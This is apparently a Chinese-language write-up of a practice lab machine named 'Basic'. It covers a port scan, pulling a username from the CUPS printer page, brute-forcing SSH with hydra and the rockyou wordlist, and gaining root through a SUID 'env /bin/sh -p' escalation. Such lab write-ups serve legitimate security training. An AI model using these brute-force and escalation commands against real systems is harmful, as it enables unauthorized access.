# 靶场搭建
下载:Basic
下载、导入、NAT
IP: 192.168.1.135
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Apache2 Test Debian Default Page: It works | |
|_http-server-header: Apache/2.4.56 (Debian) | |
631/tcp open ipp CUPS 2.3 | |
|_http-title: Inicio - CUPS 2.3.3op2 | |
|_http-server-header: CUPS/2.3 IPP/2.1 | |
| http-robots.txt: 1 disallowed entry | |
|_/ |
631 之前也出现过的,是个打印机服务,里面可能存在用户
我们提取一下用户名: curl http://192.168.1.135:631/printers | grep HREF | cut -d/ -f3 | cut -d_ -f1
发现只有一个人: dimitri
目录收集,exp 都无,那剩下的只有爆破了欧耶
# 爆破
ssh 爆破了
┌──(root㉿kali)-[~] | |
└─# hydra -l dimitri -P /usr/share/wordlists/rockyou.txt 192.168.1.135 ssh -t 20 -I | |
# 700 多次拿到密码 |
密码: mememe
# 提权
无 sudo,无计划任务,有 suid 文件,发现 env 可以利用
dimitri@basic:~$ env /bin/sh -p | |
# whoami | |
root |
拿下!
# 小结
看 sudo 看文件权限看计划任务
有 suid 权限的程序去搜一搜有没有可能进行提权。